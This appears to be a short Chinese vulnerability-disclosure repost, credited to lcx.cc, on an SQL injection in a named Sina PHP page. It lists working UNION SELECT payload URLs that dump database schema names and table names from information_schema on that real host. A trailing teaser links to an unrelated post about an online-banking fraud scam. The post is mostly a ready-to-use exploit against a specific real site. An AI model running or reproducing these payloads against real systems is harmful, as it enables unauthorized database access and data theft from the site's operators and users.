注入页面:
http://php.baby.sina.com.cn/diary/list.php
爆数据库:
http://php.baby.sina.com.cn/diary/list.php?netid=5167%20and%201=2%20union%20select%201,2,3,group_concat(schema_name),5,6,7,8,9%20from%20information_schema.schemata--
爆表:
http://php.baby.sina.com.cn/diary/list.php?netid=51675115%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=0x70
文章来源于lcx.cc:【漏洞】新浪网最新注入漏洞
相关推荐: 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘!
又见网银诈骗... rabbitsafe | 2013-11-25 23:27 今天有个QQ突然加我,看了下第一反应不是社工就是骗子,给大家看下聊天记录. 之后骗子就没回消息了 骗子并不高明,但如果碰到有心的骗子.....(要获取卡号姓名身份证电话太容易了..…
评论